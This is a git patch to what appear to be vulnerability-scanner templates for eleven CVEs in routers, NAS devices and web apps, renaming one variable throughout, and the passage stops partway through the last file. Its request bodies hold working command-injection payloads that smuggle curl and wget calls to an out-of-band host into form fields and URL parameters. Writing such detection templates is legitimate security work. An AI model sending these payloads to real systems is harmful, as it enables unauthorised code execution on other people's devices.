From e9b055e325d427891ea16116787feb475daee582 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 29 Mar 2023 19:24:19 +0530 Subject: [PATCH] update variable name --- cves/2018/CVE-2018-10562.yaml | 8 ++++---- cves/2018/CVE-2018-10818.yaml | 8 ++++---- cves/2020/CVE-2020-17456.yaml | 6 +++--- cves/2020/CVE-2020-25506.yaml | 8 ++++---- cves/2020/CVE-2020-28188.yaml | 8 ++++---- cves/2020/CVE-2020-28871.yaml | 6 +++--- cves/2021/CVE-2021-1497.yaml | 8 ++++---- cves/2021/CVE-2021-20038.yaml | 6 +++--- cves/2021/CVE-2021-21881.yaml | 8 ++++---- cves/2021/CVE-2021-36356.yaml | 6 +++--- cves/2021/CVE-2021-41653.yaml | 6 +++--- 11 files changed, 39 insertions(+), 39 deletions(-) diff --git a/cves/2018/CVE-2018-10562.yaml b/cves/2018/CVE-2018-10562.yaml index a8a7b30bc8..e638d7ca87 100644 --- a/cves/2018/CVE-2018-10562.yaml +++ b/cves/2018/CVE-2018-10562.yaml @@ -18,7 +18,7 @@ info: tags: cve,cve2018,dasan,gpon,rce,oast,kev variables: - base: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: @@ -26,13 +26,13 @@ requests: POST /GponForm/diag_Form?images/ HTTP/1.1 Host: {{Hostname}} - XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{base}}'`;busybox wget http://{{interactsh-url}}&ipv=0 + XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;busybox wget http://{{interactsh-url}}&ipv=0 - | POST /GponForm/diag_Form?images/ HTTP/1.1 Host: {{Hostname}} - XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{base}}'`;wget http://{{interactsh-url}}&ipv=0 + XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;wget http://{{interactsh-url}}&ipv=0 stop-at-first-match: true matchers-condition: and @@ -45,6 +45,6 @@ requests: - type: word part: interactsh_request words: - - "User-Agent: {{base}}" + - "User-Agent: {{useragent}}" # Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-10818.yaml b/cves/2018/CVE-2018-10818.yaml index a3c191a56c..f157cb4167 100644 --- a/cves/2018/CVE-2018-10818.yaml +++ b/cves/2018/CVE-2018-10818.yaml @@ -14,7 +14,7 @@ info: tags: cve,cve2018,lg-nas,rce,oast,injection variables: - base: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: @@ -23,14 +23,14 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - &uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{base}}' + &uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' - | POST /en/php/usb_sync.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - &act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{base}}' + &act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' stop-at-first-match: true matchers-condition: and @@ -43,6 +43,6 @@ requests: - type: word part: interactsh_request words: - - "User-Agent: {{base}}" + - "User-Agent: {{useragent}}" # Enhanced by mp on 2022/04/26 diff --git a/cves/2020/CVE-2020-17456.yaml b/cves/2020/CVE-2020-17456.yaml index bd364bde5b..83e03db640 100644 --- a/cves/2020/CVE-2020-17456.yaml +++ b/cves/2020/CVE-2020-17456.yaml @@ -17,7 +17,7 @@ info: tags: seowon,cve2020,oast,packetstorm,rce,router,unauth,iot,cve variables: - base: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: @@ -34,7 +34,7 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{base}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018 + Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018 cookie-reuse: true matchers-condition: and @@ -47,7 +47,7 @@ requests: - type: word part: interactsh_request words: - - "User-Agent: {{base}}" + - "User-Agent: {{useragent}}" - type: word part: header diff --git a/cves/2020/CVE-2020-25506.yaml b/cves/2020/CVE-2020-25506.yaml index 31d960594d..f35292e9bf 100644 --- a/cves/2020/CVE-2020-25506.yaml +++ b/cves/2020/CVE-2020-25506.yaml @@ -17,7 +17,7 @@ info: tags: cve,cve2020,dlink,rce,oast,mirai,unauth,router,kev variables: - base: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: @@ -26,10 +26,10 @@ requests: Host: {{Hostname}} Accept: */* - C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{base}}'` + C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'` - | - POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{base}}'` HTTP/1.1 + POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'` HTTP/1.1 Host: {{Hostname}} Accept: */* @@ -43,6 +43,6 @@ requests: - type: word part: interactsh_request words: - - "User-Agent: {{base}}" + - "User-Agent: {{useragent}}" # Enhanced by mp on 2022/03/27 diff --git a/cves/2020/CVE-2020-28188.yaml b/cves/2020/CVE-2020-28188.yaml index a3359eb1bf..0b09578f43 100644 --- a/cves/2020/CVE-2020-28188.yaml +++ b/cves/2020/CVE-2020-28188.yaml @@ -18,16 +18,16 @@ info: tags: cve,cve2020,terramaster,rce,oast,mirai,unauth variables: - base: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: - | - GET /include/makecvs.php?Event=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{base}}'%60 HTTP/1.1 + GET /include/makecvs.php?Event=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1 Host: {{Hostname}} - | - GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{base}}'%60 HTTP/1.1 + GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1 Host: {{Hostname}} stop-at-first-match: true @@ -41,6 +41,6 @@ requests: - type: word part: interactsh_request words: - - "User-Agent: {{base}}" + - "User-Agent: {{useragent}}" # Enhanced by mp on 2022/03/27 diff --git a/cves/2020/CVE-2020-28871.yaml b/cves/2020/CVE-2020-28871.yaml index d26a507975..6d2d4dfbb5 100644 --- a/cves/2020/CVE-2020-28871.yaml +++ b/cves/2020/CVE-2020-28871.yaml @@ -17,7 +17,7 @@ info: tags: cve2020,monitorr,rce,oast,unauth,edb,cve,fileupload,intrusive variables: - base: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: @@ -37,7 +37,7 @@ requests: Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.php" Content-Type: image/gif - GIF89a213213123